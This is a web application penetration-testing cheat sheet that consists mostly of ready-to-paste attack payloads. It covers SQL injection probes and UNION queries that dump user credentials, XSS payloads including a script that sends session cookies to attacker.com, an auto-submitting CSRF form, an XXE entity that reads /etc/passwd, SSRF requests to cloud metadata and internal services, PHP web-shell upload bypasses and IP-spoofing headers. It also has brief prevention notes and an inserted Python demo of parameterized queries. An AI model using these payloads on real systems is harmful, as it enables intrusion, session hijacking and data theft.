Web Application Security
SQL Injection
Detection
' -- single quote (SQL error = likely injectable)
'' -- doubled single quote (no error = vulnerable)
' OR '1'='1 -- always true
' OR 1=1-- -- comment out rest
" OR "1"="1
UNION-Based
' ORDER BY 3-- -- find number of columns
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,2,3--
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--
Blind (Boolean)
' AND 1=1-- -- true
' AND 1=2-- -- false
' AND SUBSTRING(username,1,1)='a'--
Blind (Time-Based)
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -- MSSQL
' AND SLEEP(5)-- -- MySQL
' || pg_sleep(5)-- -- PostgreSQL
Common Bypasses
' OR 1=1--
' OR 'x'='x
admin'--
' OR 1=1#
%27 OR %271%27=%271 -- URL encoded
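As an added illustration (not part of the original cheat sheet), the Python script below builds a constructed in-memory SQLite table and shows why the detection and bypass payloads above succeed against a string-concatenated query and fail against a parameterized one; the table, credentials and function names are assumptions made for the example.

```python
import sqlite3

# Constructed sample data for the demo; nothing here comes from a real system.
SAMPLE_USERS = [("admin", "s3cret"), ("alice", "wonderland")]


def make_db():
    """Create an in-memory SQLite database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Vulnerable pattern: user input is concatenated into SQL syntax.

    A quote or comment sequence in the input changes the statement itself,
    which is exactly what the detection/bypass payloads above rely on.
    """
    sql = (
        "SELECT username FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return [row[0] for row in conn.execute(sql)]


def login_safe(conn, username, password):
    """Hardened pattern: a parameterized query.

    The statement text is fixed; values are bound separately by the driver,
    so quotes, OR clauses and '--' in the input are treated purely as data.
    """
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def compare(payload_user, payload_pass):
    """Run the same input through both versions and return the results."""
    conn = make_db()
    return {
        "vulnerable": login_vulnerable(conn, payload_user, payload_pass),
        "safe": login_safe(conn, payload_user, payload_pass),
    }


if __name__ == "__main__":
    # admin'-- comments out the password check in the vulnerable query.
    print(compare("admin'--", "wrong"))
    # ' OR '1'='1 makes the WHERE clause always true in the vulnerable query.
    print(compare("' OR '1'='1", "' OR '1'='1"))
```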
Cross-Site Scripting (XSS)
Types
- Reflected — payload in request, reflected in response
- Stored — payload saved in DB, shown to all users
- DOM-based — payload executed via client-side JS
Basic Payloads
<script>alert(1)</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
"><script>alert(1)</script>
';alert(1)//
Cookie Stealing
<script>
document.location='http://attacker.com/steal?c='+document.cookie
</script>
Filter Bypasses
<ScRiPt>alert(1)</ScRiPt> -- case variation
<script>alert(1)</script> -- unicode escape
<img src=1 onerror=alert(1)> -- HTML entities
<scr<script>ipt>alert(1)</script> -- nested tags
Cross-Site Request Forgery (CSRF)
What It Is
Forces a logged-in user to perform unintended actions.
Basic PoC
<form action="https://target.com/change-email" method="POST">
<input type="hidden" name="email" value="attacker@evil.com">
<input type="submit" value="Click Me">
</form>
<script>document.forms[0].submit()</script>
GET-based CSRF
<img src="https://target.com/transfer?amount=1000&to=attacker">
Prevention
- CSRF tokens (synchronizer token pattern)
- SameSite cookie attribute
- Custom request headers
- Double submit cookie
Security Headers
Content-Security-Policy: default-src 'self'
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy: geolocation=(), microphone=()
Common Vulnerabilities Quick Reference
IDOR (Insecure Direct Object Reference)
/api/user/123/profile → try /api/user/124/profile
/download?file=report_user123.pdf → change to another user's file
Open Redirect
https://site.com/redirect?url=https://evil.com
XXE (XML External Entity)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
SSRF (Server-Side Request Forgery)
https://site.com/fetch?url=http://169.254.169.254/latest/meta-data/
https://site.com/fetch?url=http://localhost:6379/ (Redis)
https://site.com/fetch?url=http://internal-server/admin
File Upload Bypass
shell.php → shell.php.jpg
shell.php → shell.PhP
shell.php → shell.php%00.jpg
Add image magic bytes: FF D8 FF E0 (JPEG)
Useful HTTP Headers to Test
X-Forwarded-For: 127.0.0.1 -- bypass IP restrictions
X-Real-IP: 127.0.0.1
X-Original-URL: /admin -- path override
X-Custom-IP-Authorization: 127.0.0.1
Referer: https://trusted.com